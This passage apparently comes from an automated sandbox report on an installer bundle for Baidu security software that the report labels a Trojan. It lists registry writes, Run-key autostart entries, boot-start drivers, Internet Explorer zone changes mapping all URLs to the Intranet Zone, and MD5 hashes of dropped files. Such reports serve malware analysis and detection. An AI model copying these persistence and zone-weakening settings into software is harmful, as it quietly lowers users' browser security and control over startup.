"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"
[HKCR\AppID\BDSWShellExt.DLL]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"
[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0]
"(Default)" = "BDSWShellExt 1.0 Type Library"
[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{11292110-6F8D-4D56-863C-44902A1E7880}" = "BDSWShellExtMenu Class"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
[HKCR\BDSWShellExt.BDSWShellExtMenu\CurVer]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 71 9E 3C 0D 63 E2 61 C2 FB D3 E1 0A 4F 6A D0"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu"
[HKCR\BDSWShellExt.BDSWShellExtMenu.1]
"(Default)" = "BDSWShellExtMenu Class"
[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\HELPDIR]
"(Default)" = ""
The process regsvr32.exe:2920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F F6 38 0A 7D 97 9D D3 DF 05 A4 B3 C6 06 2B 3A"
[HKCR\CLSID\{85E0B1AA-04FA-11D1-B7DA-00A0C90348D6}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll"
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{85E0B1AA-04FA-11D1-B7DA-00A0C90348D6}]
"(Default)" = "U盘防护"
The process BDALeakfixer.exe:3188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 76 B7 E6 15 79 BC 6A 18 C6 B8 43 45 A3 7A B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process BaiduAn.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\Unknown\shell\openas\command]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDAFileHelper.exe -file=%1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 7C 15 E4 69 33 2F 19 AE 2E 6D 77 26 B5 CD FC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process BaiduAn.exe:1952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C E8 9A 45 08 DD CF BE DB 4A 22 26 34 B7 10 4E"
The process BaiduSdBugRpt.exe:2180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 62 36 76 0D 94 71 92 3D B2 54 6F 43 D7 63 CA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process BaiduSdUpdate.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 55 CD F2 62 64 E0 18 C7 E4 9C BC CE 56 0E B5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process BaiduSdUpdate.exe:2228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 66 9F 73 E1 8D 2C 1C B8 99 FB 78 3A 3A 3E 9E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process BaiduAnSvc.exe:3768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 82 47 CB B2 28 84 0F 65 43 C6 B7 B0 8E E9 75"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process BaiduAnSvc.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 42 A9 9B D4 D3 8C 18 67 99 70 55 28 C0 D1 F9"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"INSTLANG" = ""
"InstallDate" = ""
[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_gj" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"Version" = "3.0.0.3971"
"InstallDir" = "%Program Files%\Baidu\BaiduAn"
"VirusTime" = ""
"SupplyID" = ""
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\BDEnhanceBoost]
"Start" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe -stmd=3"
The process BaiduSdSvc.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DisplayName" = "BDMWrench"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"ImagePath" = "system32\DRIVERS\BDMWrench.sys"
[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Description" = "BDMWrench"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "百度æÂ€毒功能组件"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Tag" = "5"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Type" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Group" = "bddriver"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"
"Tag" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 47 09 53 FA 97 48 18 BF 47 64 39 0F 07 61 E3"
[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_sd" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = ""
[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"ErrorControl" = "0"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"
[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"
[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Group" = "COM Infrastructure"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3"
"baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Start" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\BDMWrench\Security]
[HKLM\System\CurrentControlSet\Services\BDMWrench]
[HKLM\System\CurrentControlSet\Services\BDMWrench\Enum]
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DeleteFlag"
Dropped PE files
MD5 | File path |
---|---|
40bc0f5d3bb961b7b76276f0292fd708 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\F1023_s_30803.exe |
9fa45f9017584f7a73f7359dad2caf26 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\BDMSkin.dll |
f1a3e3d2552723cf46f1e9aaa4741877 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll |
17c360226bee79f8e544907084f599e8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll |
40bc0f5d3bb961b7b76276f0292fd708 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe |
123df1ab69a1d32b42a9d6c797ac5447 | c:\Program Files\Common Files\Baidu\BDDownload\108\7z.dll |
c7ac6fdc3f233399708cdf5edb4f7343 | c:\Program Files\Common Files\Baidu\BDDownload\108\bdcomproxy.dll |
2ecb6110aade861f16c9ca210f3ea005 | c:\Program Files\Common Files\Baidu\BDDownload\108\bddownloader.exe |
2619bdb16bafaec8304fae07e459f321 | c:\Program Files\Common Files\Baidu\BDDownload\108\dl.dll |
9156ae112ea0989ef04dfe5e97f17b4e | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll |
676835dc52b67fc7150e9c6336da6556 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll |
a0e2fc0daea50c40aba3c90db558bcce | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll |
9f1c8cf481b790de9cd2275505dd1bac | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll |
d9cce68f84f576bd244c91fb6df7d73d | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll |
bad438e36d73f20cb60e738fb9974198 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll |
89d798adf093aebaf041fd0197ede893 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll |
34615a5c3ad5b59208d57674cb0f26fe | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll |
dce4321312ff1fc63323d6b6a9f06522 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll |
c1ae08fe4bb466d651fdc4d3a943bdeb | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll |
d4c2ce04bad7eb4d408118021e85dddb | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll |
cdb1722edcaf6a211344d80e30f2c295 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll |
06792f4af5c6d9b02be39ada55d2fbd7 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll |
ed5776988c1f89b6b3b24a3e174f1218 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll |
605fcf4a03fe970725008fdaab511818 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll |
6946e725d396a13c44529adbe63c4ecc | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll |
d280f73128561a62e8709fd81faa6097 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll |
0177e3ded91fa30a3514e642c215d277 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe |
af88ec6399f527720b342482e1a03cb8 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe |
92c3bc063c1fc4acf176b8e7364c96d7 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll |
734b342d7091f44c1deeeb8be3313a8c | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe |
9474fcb760cd07111a05a0159138b9d2 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll |
ec1059187b4cd5cf1f3d743a8b2693ff | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll |
ae6b6a43cead19395446ee132b787249 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll |
1fc801576f8b397276245edf7039b427 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll |
04116475cff6d3305a8233c8342ffa88 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys |
c39fa78d836fcc2c62d16bac891394f8 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys |
85e228f2d13456e145dd756b4d7fc6e2 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll |
d5402c14fd9a98a47614f2e8fdfdfbca | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll |
947ccea3196c6d67babd6c4d5ca71d50 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll |
3f40b1504d7696ba7341f7ba465e3b56 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll |
1c7a49db64849cdfaf0d9010661e6385 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll |
9b664677838ed675f52337e910e0dc6c | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll |
3b4ef9c679537e2632ffbdbb0186f1b0 | c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll |
bd41d5bb8e1a290fc17cb963522c0099 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll |
1b8c4af1ac0cee8301b10e5aa15751e7 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll |
f01e5681328e98ea61465eb3d894078e | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll |
2794ecd5040fcd59772d215c10f56470 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll |
fd875b7677013cb59776fb1633c061bc | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll |
0f893b451ce2e3dcc6fb17eb6ddf7e43 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll |
6075d26c90a855f6a852f435d8e695eb | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll |
d1fdc340269ec3326eee750ff8bc359b | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDConfig.dll |
923cc6aaf4c48002c1c96faa77367071 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDCooly.dll |
4f2cfb572029ac7bea92412b3f18670d | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll |
c5533d7d431938cf63ae27bb7cd561cc | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll |
31dd6c0b6da00047dcc24faa1fcb3c46 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll |
7169568c9d40e606231eda197db86d9f | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll |
79e8dc5bff7304f2e749bd7a3ede966e | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll |
d0352acd1acbb264b93a4d4718115ce2 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll |
87b28b0d55af94230442446ae6073be7 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll |
8ec7a9dade53bc0ea8d6b65f564e21c7 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe |
5510bdc5bae1f0cc430b7b32c7948bb0 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll |
359bbf27d9f71185351ea635202ebed3 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll |
3fe09f45335f290cad98e80ea59893fb | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll |
28f81cdb8871f62237efc4750df5e54f | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll |
68e4ebe183d32eff69d83aca52fdb335 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll |
2ae0a5334f559ba4f1944a2e60de2778 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll |
fff0616db65911080007bac98e198854 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMNet.dll |
047bfa4e2dd76866c2497433efee37cd | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll |
e4ad30b794a43e48da82eb66de87d316 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMReport.dll |
0b0edc38e7ac2c378bb79ab62375eef1 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll |
c7087e78c232b8919990539953a2d2c7 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll |
b8e15a6d8b5208a0d0dee8b93dbf2160 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll |
fbcf33e8388bcadd5a98186cb1a954a5 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll |
ac39daf741186cac2cb39967bf3f3ed4 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll |
f106d55b6b37793829dfee5b03a4917d | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll |
39ad853ef66059994900e083e9fa4a8b | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll |
c44bc8da33cae81d76fdd4a0285dc28e | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll |
3f34b9074ffa20a4712fbc2bde5df727 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe |
48ec40617c6b7d7d319f0648dc1e43b0 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe |
6a9766f5b15ce63bca734cf0da6b9c09 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe |
89418d3900eb4a2f0a8711f476c4b5ce | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe |
656e264a38633623ae060e29578e2129 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe |
2d79c25c5c36081f9be5a644616b523b | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe |
e9babe25db0493a84c8854b831ca63bd | c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe |
23e5fbdc96d55dfb9a26e36081a5569f | c:\Program Files\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe |
97576609781bf4d4fdb916a4b2352540 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\DriverManager.dll |
af91977a6e11df402f8318cb286fdfc3 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll |
733f326a12b12ce6e628ffd9d7fba47a | c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll |
815632cea661098fafc34400a8a4d42e | c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll |
379704add22ef7576ee44cae85b39242 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll |
c30f5e1c544a396079a91ee0133971a3 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\ad.dll |
df636a0b62a7b2627fc9b2d350b4bc97 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll |
a6b8d4596009dfdae37bcc14d9904201 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll |
98bf84947e98aa85d22f8a0144bbf7f9 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll |
400aa2fc8af4b6b251ecfea115d5aaad | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll |
d1eab731b9eb18c4b13000b9a1c3d84e | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll |
09829203238dca6f960c9e30aac4dfaf | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll |
997a38d43d043e31c8f4550793a81b74 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll |
20ac34370b7e1780339cbfd3b085a6a4 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll |
09809686fef1a0db344d839a72b2f7ae | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll |
6ae8aa8348ed430cae50efb884be5193 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll |
d2b5c85c7708a619acc60c518bb451ac | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll |
ab5e37a075539acb8976b7d7eb649222 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll |
8c35a808addc5877258a03af691c30be | c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll |
2619bdb16bafaec8304fae07e459f321 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\dl.dll |
34e11d25672bdf576c0bf780ee757ec5 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys |
b6edb1e0321c5f2f75352832ce21b507 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys |
